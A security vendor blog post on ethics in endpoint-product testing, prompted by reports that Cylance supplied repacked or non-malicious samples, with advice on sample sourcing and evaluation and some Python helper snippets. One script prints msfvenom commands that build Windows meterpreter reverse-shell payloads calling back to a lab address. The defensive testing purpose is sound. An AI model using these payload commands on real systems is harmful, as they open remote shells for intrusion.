

Cylance and Questionable Ethics in Security Product Testing

Michael Viscuso and Rick McElroy
April 18, 2017

There’s been a lot of talk recently about security product testing. Testing best practices, methodology, biases, accuracy, and even ethics have come under fire.

The stakes have never been higher in cybersecurity. Our financial information, healthcare records, personal devices and even democracy are at risk and under attack. Cybersecurity vendors have a responsibility to keep customers safe and should be held to the highest standards when it comes to product efficacy and transparency with customers.

A recent piece from Ars Technica’s Sean Gallagher reveals where one vendor, Cylance, may have fallen short on being completely transparent with prospective customers by reportedly providing malware sample sets that “weren’t malware at all.”

Among the key points of the piece:

“A systems engineer at a large company was evaluating security software products when he discovered something suspicious. One of the vendors [Cylance] had provided a set of malware samples to test—48 files in an archive stored in the vendor’s Box cloud storage account…Curious, the engineer took a closer look at the files in question—and found that seven weren’t malware at all.

“That led the engineer to believe Cylance was using the test to close the sale by providing files that other products wouldn’t detect—that is, bogus malware only Protect would catch.”

“The case against Cylance turns on the practice of “re-packing” existing malware samples—essentially turning them into “fresh” malware. Rather than passing prospective customers raw malware samples to test, Cylance first alters the files using software utilities commonly referred to as “packers.” Packers convert executable files into self-extracting archives or otherwise obscure their executable code.”

“The files that only Cylance caught in the test were all repacked in some way; five of the files were processed with MPRESS and the remainder were packed with other tools, including what appears to be a custom packer.”

“Of the nine files in question, testing by the customer, by Ars, and by other independent researchers showed that only two actually contained malware.”
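The re-packing described in these excerpts is often detectable heuristically: packed or encrypted executables tend to have near-random byte distributions. A minimal sketch in Python (the 7.0-bit threshold is a common rule of thumb, not a hard cutoff, and real triage tools combine this with other signals):

```python
import math
import os
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant data, approaching 8.0 for random data."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Flag a sample whose overall entropy suggests packing or encryption."""
    return shannon_entropy(data) > threshold

# Random bytes mimic a packed/encrypted payload; repeated bytes mimic plain code/data.
print(looks_packed(os.urandom(4096)))  # high entropy -> flagged as likely packed
print(looks_packed(b"A" * 4096))       # low entropy  -> not flagged
```

In a real evaluation you would run this per PE section rather than over the whole file, since legitimate binaries often contain one compressed resource section.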

We’ll be the first to say that testing is a hard problem to solve. Just as there is no “silver bullet” security solution, there is no “one-size-fits-all” test to universally determine the “winning” product. As a buyer, a keen eye is required. It is critical for today’s buyers to consider both the source of the test and the standards the product is measured against.

We believe there needs to be a paradigm shift in how tests measure efficacy. Until that shift occurs, we’d like to help you do two things:

  1. Understand how to weed out security tests that might be biased.
  2. Outline two key, additional criteria, beyond preventing attacks, you should consider when evaluating endpoint security products.

Unbiased Testing

There are a few simple guidelines you can follow to ensure the integrity of a security product test.

Be a Skeptic. Be wary of testing advice from vendors. That’s right. We’re a vendor, and we recommend you proceed with caution when taking testing advice from vendors. Lean on vendors and ask WHY they are making a particular recommendation. Most importantly, determine if the recommendation maps accurately to your organization’s specific requirements.

Malware Samples Provided by a Vendor Aren’t Always Legitimate. This goes back to point one: Be a skeptic. Samples that come from a vendor are sometimes manipulated to favor their product over others. In the worst-case scenarios (which we’ve seen), the samples are non-functional or not even malicious. If you get samples from a vendor, ask them for fewer samples and lean on the vendor to tell you what’s malicious about them. (If you aren’t sure how to verify the samples, see our “visibility” recommendations below.)

If you don’t want to use malware samples from vendors, use public sandboxes and analysis blogs, such as hybrid-analysis.com, virusshare.com, malshare.com and malware-traffic-analysis.net. These sites have repositories of authentic malware and can provide a deep technical analysis so you know how the malware should function. Focus on quality samples that demonstrate attacks you’re interested in. Quantity is not a good indicator of sample set quality or relevance.
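One practical way to cross-check a vendor-supplied sample set is to hash each file and look the hashes up in those public repositories yourself; a sample already cataloged on virusshare.com or hybrid-analysis.com comes with independent analysis, while a sample with no history anywhere deserves extra scrutiny. A minimal hashing sketch (the directory path is a placeholder):

```python
import hashlib
from pathlib import Path

def sha256_of(path: Path, chunk_size: int = 65536) -> str:
    """Stream a file through SHA-256 so large samples never load fully into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def hash_sample_set(directory: str) -> dict[str, str]:
    """Map each file in the vendor's sample directory to its SHA-256 digest."""
    return {p.name: sha256_of(p) for p in Path(directory).iterdir() if p.is_file()}

# Search each digest on the public repositories listed above before trusting
# the vendor's description of what the sample does.
```

SHA-256 is the digest most of these repositories index on, which is why it is used here rather than MD5.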

Go Beyond Samples and Test How the Product Handles Real-World Attacks. Malware samples alone are going to demonstrate one thing – how well the product can stop the particular malware samples in your sample set. You’re interested in stopping attacks, not just malware. Real-world attackers don’t rely on packed executables. They use documents, PowerShell, Python, Java, built-in OS tools, ANYTHING they can leverage to get the job done. To test the solution against real-world attack techniques, use a penetration testing framework such as Metasploit. Construct payloads with Veil-Evasion and use the techniques seen in real attacks. PowerShell Empire is also a great way to build PowerShell command lines and macro-enabled documents that go beyond executable malware samples. Also, turn prevention off and watch what the samples do. If you can’t see what the samples do when prevention is turned off, what will you do when a sample gets through in the real world?
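For reference, the command shapes involved look roughly like the following hypothetical sketch. The LHOST/LPORT values are placeholders; the script only prints the commands so you can review and adapt them before running anything, and only ever in an isolated lab network:

```shell
#!/bin/sh
# Illustrative Metasploit msfvenom invocations for an isolated test lab.
# The same payload can be generated as a classic executable or as a
# PowerShell command line -- a good product should be tested against both.

MSFVENOM_EXE='msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.56.10 LPORT=443 -f exe -o payload_test.exe'
MSFVENOM_PSH='msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.56.10 LPORT=443 -f psh-cmd -o payload_test.ps1.cmd'

# Print for review instead of executing directly.
printf '%s\n' "$MSFVENOM_EXE" "$MSFVENOM_PSH"
```

The point of the two output formats (`-f exe` vs. `-f psh-cmd`) is exactly the one above: a product that only inspects executables can miss the identical payload delivered through PowerShell.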

Other Criteria to Evaluate

  1. How well the product fits in with your existing people, processes and technologies.
  2. The product’s ability to reduce attacker dwell time in your environment.

The Most Effective Security Product is the One Your Team Actually Uses. Product A might have a score of 98% while Product B might have a score of 95%. The apparent choice is Product A, right? Not necessarily. A 3% delta suggests there’s a difference between the products, but the difference is so minor that the ranking could flip in the very next test. Don’t make this difference the deciding factor. You want to deploy a product that’s usable by your team and fits into your existing security stack. Even if that’s Product B in this scenario, you’ve made the “better” decision.
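To make the uncertainty concrete, suppose (hypothetically) each score came from a 100-sample test, roughly the size of the sample sets vendors typically hand out. A normal-approximation confidence interval on each detection rate shows the two products are statistically indistinguishable at that sample size:

```python
import math

def detection_ci(detected: int, total: int, z: float = 1.96) -> tuple[float, float]:
    """Approximate 95% confidence interval for a detection rate (normal approximation)."""
    p = detected / total
    margin = z * math.sqrt(p * (1 - p) / total)
    return (max(0.0, p - margin), min(1.0, p + margin))

# Hypothetical: Product A caught 98/100 samples, Product B caught 95/100.
a_low, a_high = detection_ci(98, 100)
b_low, b_high = detection_ci(95, 100)
print(f"Product A: {a_low:.3f}-{a_high:.3f}")  # roughly 0.953-1.000
print(f"Product B: {b_low:.3f}-{b_high:.3f}")  # roughly 0.907-0.993

# The intervals overlap, so this one test cannot separate the two products.
```

Only with a much larger (and representative) sample set does a 3% delta start to mean anything, which is another reason not to treat a single vendor-supplied test as decisive.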

Don’t be ashamed to pick the product that makes the most sense to your team or fills a gap in your tech stack. The independent testing authorities try to test efficacy. Only you can test applicability. If the product becomes shelfware, it’s wasting money and not doing anything to make you safer.

Visibility, Detection, and Response to Reduce Dwell Time in Your Environment. We can’t emphasize this point enough. Endpoint security products should prevent, detect, and help you respond to breach scenarios. They should be tested that way as well. There’s much more to stopping today’s attacks and empowering your team than “blocking X-thousand malware samples.”

Every prevention approach is liable to fail at some point. When it does, how will you know? Your security solution should give you information you can act on, beyond a simple malware block. When testing the solution, think about how it can be used in actual defensive scenarios when the attacker has succeeded. Does it make your life easier as a responder? Does it provide you with the visibility you need to determine the scope and impact? Does it offer insight into the tactics, techniques, and procedures your real-world adversaries are using?

To see the product’s visibility, detection, and response features, don’t just rely on finding a way around the prevention – turn the prevention off. If your team doesn’t find value when the prevention is off, it isn’t a good product.


We realize there is a certain conflict of interest in this post. “Here we go again. Another vendor is telling me how I need to test.” We understand where you are coming from. And while we want to “win” in this highly competitive endpoint security market, what we want more is for your organization to be more resilient against cyberattacks.

That resilience starts with shifting our perspective on testing efficacy. Until that paradigm shift becomes a reality, we want you to best leverage the existing system to find the right answers for your organization.

Stopping malware should be only one facet of protecting your organization from modern attacks. We need to start testing against how we are attacked and, until the majority of independent tests reflect this shift, the burden of responsibility is largely on you, the buyer, to ensure vendors are testing real-world attacks ethically and without bias.

Ask the hard questions, demand more, and don’t settle. You should have the right security solution for your organization. Anything less is a waste of money and resources.


This blog post is meant to start the discussion; it’s by no means an exhaustive list of testing best practices. We’d like to be leaders in this discussion, and listening to your input is critical. If you’d like to continue this discussion with us, find us on Twitter @MichaelViscuso and @InfoSecRick.


To learn how to defend your organization from non-malware attacks, join us at the upcoming webinar: “Beyond AV Webinar: Cb Defense in 20 Minutes.”

TAGS: Carbon Black / ethics / security product testing